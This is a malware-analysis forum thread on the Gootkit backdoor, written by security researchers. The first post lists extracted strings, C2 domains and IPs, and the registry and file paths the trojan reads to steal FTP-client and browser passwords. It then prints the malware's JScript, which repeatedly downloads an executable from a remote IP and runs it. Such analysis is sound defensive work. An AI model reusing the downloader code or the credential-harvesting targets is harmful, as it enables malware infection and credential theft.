Win32/Gootkit

Forum for analysis and discussion about malware.

Win32/Gootkit

Postby EP_X0FF » Tue Jun 08, 2010 2:36 pm

Russian origin (probably) backdoor trojan.

Dropper VT result

http://www.virustotal.com/analisis/08e858ca0e6a1e8bdb965400f9738368d5fbba91fc3658267e843f64d7661c0f-1276006713

Container with malicious payload dll inside.

Spawns svchost.exe copy with GootkitSSO (see below) component loaded as library.
Downloads additional component, stores it in %temp% directory and then executes from svchost.

Extracted executable VT result
http://www.virustotal.com/analisis/e8fcd05758a8e1a4bf945f4913e10557b80120f25e329f06d8642017dd353787-1276006850

Code: Select all
Mutant
\\.\PrepetiumVirta
POST %s HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en)
Host: %s
Accept: text/html
Connection: Keep-Alive
Content-Length: %d
Content-Type: multipart/form-data; boundary=%s
Content-Disposition: form-data; name="data"
----------XEqOcMUhJz1uu5ZoHVzpHt
**RetCode:
Gootkit ldr 4
GET
%d%d%d.exe
heathen.cc
v00d00.org
ru7noh8quoob8moh.com
taishous4nohshiy.com
oyah9eeshacei2ae.com
SYSTEM\
Randseed_1
Randseed_2
SYSTEM\
Randseed_1
Randseed_2
Software\Microsoft\Windows\CurrentVersion\Group Policy Objects
SetIEPolicy: break
http://www.vedomosti.ru/
Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\%s\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
[nothing]
@xh$\\?\globalroot\systemroot\system32\drivers\vitra.sys
\SystemRoot\System32\drivers\vitra.sys
BPSitelist
Port
Password
Login
SiteAddress
Site%d
NumEntries
Main
Software\BPFTP\Bullet Proof FTP\
Software\BPFTP
InstallDir1
Software\BulletProof Software\BulletProof FTP Client\Options
Software\BPFTP\Bullet Proof FTP\Options
SitesDir
Software\BulletProof Software\BulletProof FTP Client\Main
Software\BPFTP\Bullet Proof FTP\Main
LastSessionFile
robert249fsd)af8.?sf2eaya;sd$%85034gsn%@#!afsgsjdg;iawe;otigkbarr
Hostname
Username
Software\CoffeeCup Software\Internet\Profiles
hdfzpysvpzimorhk
User
Host
Software\FTPWare\COREFTP\Sites
CryptUnprotectData
crypt32.dll
smdata.dat
tree.dat
sm.dat
\GlobalSCAPE\CuteFTP Pro\
\GlobalSCAPE\CuteFTP\
SOFTWARE\Microsoft\Windows\ShellNoRoam\MUICache
cuteftppro.exe
cutftp32.exe
HostName
Software\Far\SavedDialogHistory\FTPHost
Software\Far\Plugins\FTP\Hosts
HostAdrs
UserName
Software\Sota\FFFTP\Options
Pass
Server
Servers
FileZilla3
\FileZilla\sitemanager.xml
yA36zA48dEhfrvghGRg57h5UlDv3
\History.dat
\Quick.dat
\Sites.dat
DataFolder
Software\FlashFXP\3
Install Path
Software\FlashFXP
path
\FlashFXP\3
Item
Ftp
\Frigate3\FtpSite.XML
FTP Commander Deluxe
FTP Commander
FTP Navigator
FTP Commander Pro
anonymous
ftplist.txt
UninstallString
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\
Software\FTP Explorer\Profiles
v00d00.org/put_accs.dll
\FTPRush\RushSite.xml
rh$M
rh$D
rh$B
rh$Val
rh$ForceRemove
sh$NoRemove
sh$Delete
sh$AppID
CLSID
Component Categories
FileType
Interface
Hardware
Mime
SAM
SECURITY
SYSTEM
Software
TypeLib
\signons3.txt
\signons2.txt
\signons.txt
Install Directory
\Main
Software\Mozilla\Mozilla Firefox
Path
Profile0
IsRelative
profiles.ini
\Mozilla\Firefox\
SECITEM_FreeItem
PK11_FreeSlot
NSS_Shutdown
PK11SDR_Decrypt
PK11_Authenticate
PK11_GetInternalKeySlot
NSSBase64_DecodeBuffer
NSS_Init
nss3.dll
softokn3.dll
plds4.dll
plc4.dll
nspr4.dll
http
Log profile
\Opera
\profile\wand.dat
Software\Opera Software
Last Directory3
kDPAPI:
MS IE FTP Passwords
WininetCacheCredentials
https://
http://
ftp://
:StringData
internet explorer
PStoreCreateInstance
pstorec.dll
Software\Microsoft\Internet Explorer\IntelliForms\Storage2
abe2869f-9b47-4cd9-a358-c22904dba7f7
D:"Transfer Port"
S:"Password"
S:"Username"
S:"Hostname"
\Sessions
Software\VanDyke\SecureFX
Config Path
\VanDyke\Config\Sessions
FavoriteItem
\SmartFTP\Client 2.0\Favorites
#text
InstallDir
Software\Ghisler\Total Commander
Software\Ghisler\Windows Commander
password
username
host
connections
\wcx_ftp.ini
[/quote]

and more strings.

Set dll in registry with help of [b]HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad[/b] key as [b]GootkitSSO[/b].

[url]http://www.virustotal.com/analisis/7b4fa216a467b10159cd08fe7bcc6a8a00990fd08204de01a1ff2838c60d8ae0-1276007178[/url]

Dll also contains few strings.

Gtk1 process keeps connection with

78.140.15.82:1863 and 443 (https)
27.152.135.79:3129 (which is belongs to IP-addresses affiliated with control panel of[b] Eleonore Exploits[/b] pack)

Named Gootkit because of numerous strings inside and mutex [quote]\BaseNamedObjects\gootkit[/quote]

Produces debug output (after reboot)
[quote]Script Entry()
start thread for 'hxxp://78.140.15.82/quu3aiVai7Lei6epha7azoYegah4da9za2rec8ahngoosu7tuneemoizee5vael5eBoazahHephaahohTa3eecoochaiseesheichoh7aikuz0uas8zeekiaChiayeVa/scripts/thread1.script'
thread1 Entry()[/quote]

Script below
[quote]//#JScript
PrintValue("thread1 Entry()");
//**********************************************************************
//  BASIC Variables,
//  Do not remove.
//**********************************************************************
var FILE_ATTRIBUTE_DIRECTORY=0x00000010,
   FILE_ATTRIBUTE_READONLY=0x00000001, 
   FILE_ATTRIBUTE_HIDDEN=0x00000002,
   FILE_ATTRIBUTE_SYSTEM=0x00000004, 
   FILE_ATTRIBUTE_DIRECTORY=0x00000010, 
   FILE_ATTRIBUTE_ARCHIVE=0x00000020, 
   FILE_ATTRIBUTE_DEVICE=0x00000040, 
   FILE_ATTRIBUTE_NORMAL=0x00000080, 
   FILE_ATTRIBUTE_TEMPORARY=0x00000100, 
   FILE_ATTRIBUTE_SPARSE_FILE=0x00000200, 
   FILE_ATTRIBUTE_REPARSE_POINT=0x00000400, 
   FILE_ATTRIBUTE_COMPRESSED=0x00000800, 
   FILE_ATTRIBUTE_OFFLINE=0x00001000, 
   FILE_ATTRIBUTE_NOT_CONTENT_INDEXED=0x00002000, 
   FILE_ATTRIBUTE_ENCRYPTED=0x00004000, 
   FILE_ATTRIBUTE_VIRTUAL=0x00010000; 

var RESUME_PROCESS_THREADS = 1,
    SUSPEND_PROCESS_THREADS = 0;

var DEBUG_PRIVELEGES_ENABLED = 1,
    DEBUG_PRIVELEGES_DISABLED = 0;

var IE_WAIT_FOR_PAGE = 1,
    IE__DONT_WAIT_FOR_PAGE = 0;

var IPPROTO_IP = 0,
    IPPROTO_ICMP = 1,
    IPPROTO_TCP = 6,
    IPPROTO_PUP = 12,
    IPPROTO_UDP = 17,
    IPPROTO_IDP = 22,
    IPPROTO_ND = 77;

var HKEY_CLASSES_ROOT = 0,
    HKEY_CURRENT_USER = 1,
    HKEY_LOCAL_MACHINE = 2,
    HKEY_USERS = 3,
    HKEY_PERFORMANCE_DATA = 4,
    HKEY_PERFORMANCE_TEXT = 5,
    HKEY_PERFORMANCE_NLSTEXT = 6,
    HKEY_CURRENT_CONFIG = 7,
    HKEY_DYN_DATA = 8,
    HKEY_CURRENT_USER_LOCAL_SETTINGS = 9;

var REG_SZ = 1,
    REG_EXPAND_SZ = 2,
    REG_DWORD = 4,
    REG_DWORD_BIG_ENDIAN = 5;

var WAIT_INFINITI = -1;
var OpenFileForReading = 1, OpenFileForWriting = 2, OpenFileForAppending = 8;
var TristateUseDefault = -2, TristateTrue = -1, TristateFalse = 0;

//**********************************************************************
//  BASIC Functions,
//  Do not remove.
//**********************************************************************
function isInt(x) {
    var y=parseInt(x);
    if (isNaN(y)) return false;
    return x==y && x.toString()==y.toString();
}

function strpos( haystack, needle, offset) {
   if(offset) offset = offset ;
   else offset = 0 ;
   return haystack.indexOf(needle, offset);
}

function stristr (haystack, needle, bool) {
    var pos = 0;
 
    haystack += '';
    pos = haystack.toLowerCase().indexOf( (needle+'').toLowerCase() );
    if (pos == -1){
        return false;
    } else{
        if (bool) {
            return haystack.substr( 0, pos );
        } else{
            return haystack.slice( pos );
        }
    }
}

function ProcessCreatedCallback(pid, path, cmdline, waitorno){
}

while(true){
   var tempfile = wapi_GetTempFileName();

   var xmlhttp = new ActiveXObject("Msxml2.XMLHTTP");
   
   xmlhttp.open("GET", "hxxp://78.140.15.82/protod.exe", false);
   xmlhttp.send();
   
   if(xmlhttp.status == 200){
      var stream = new ActiveXObject("ADODB.Stream");
      stream.Type = 1;
      stream.Open();
      stream.Write(xmlhttp.responseBody);
      stream.Flush();
      stream.Position = 0;
      stream.SaveToFile(tempfile, 2);
      stream.Close();
      delete stream;
      calcpid = papi_ExecCommandLine(tempfile, "", IE_WAIT_FOR_PAGE, "ProcessCreatedCallback");
   }
   
   delete xmlhttp;
   wapi_Sleep(5000);
}

PrintValue("thread1 End()");



Protod.exe attached in gtk1.rar
You do not have the required permissions to view the files attached to this post.
Ring0 - the source of inspiration
User avatar
EP_X0FF
Global Moderator
 
Posts: 4759
Joined: Sun Mar 07, 2010 5:35 am
Location: Russian Federation
Reputation point: 571

Re: Backdoor Gootkit

Postby gjf » Thu Jun 10, 2010 10:50 am

Just because you have named it so! :)
Backdoor.Win32.Gootkit.a
VirusInfo / Defendium / SafeZone Helpers Crew
User avatar
gjf
 
Posts: 198
Joined: Mon Mar 15, 2010 10:23 am
Location: Where I lay my head is home
Reputation point: 26

Re: Backdoor Gootkit

Postby NOP » Sun Jun 20, 2010 11:15 am

Gootkit v2.1

SYS(packed) strings:

Gootkit v2.1
Fuck you, dumper :\
\SystemRoot\system32\kernel32.dll
\SystemRoot\system32\ntdll.dll
rk.sys
DllEntryPoint
You do not have the required permissions to view the files attached to this post.
NOP
 
Posts: 36
Joined: Wed Mar 31, 2010 4:56 pm
Reputation point: 5

Vundo Reverse Engineering of Dropper-KMode Drive #1

Postby Evilcry » Tue Jun 29, 2010 7:20 am

Hi,

Due to heavy number of screenshots, I attach the direct link to Backdoor Gootkit Reverse Engineering of Dropper- KMode Driver and Network Analysis #1

http://evilcodecave.blogspot.com/2010/06/backdoor-gootkit-reverse-engineering-of.html

Soon I'll publish the Secondo Episode, in attachment the malicious dll carved put from TCP Stream.


Have a nice Day,
Giuseppe 'Evilcry' Bonfa
You do not have the required permissions to view the files attached to this post.
Evilcry
 
Posts: 135
Joined: Tue Apr 20, 2010 6:10 pm
Reputation point: 90

Re: Backdoor:Win32/Otlard.A (alias Gootkit)

Postby EP_X0FF » Sun Jan 04, 2015 4:38 am

Up. Presumable first generation of Gootkit malware family.
Ring0 - the source of inspiration
User avatar
EP_X0FF
Global Moderator
 
Posts: 4759
Joined: Sun Mar 07, 2010 5:35 am
Location: Russian Federation
Reputation point: 571


Return to Malware

Who is online

Users browsing this forum: No registered users and 11 guests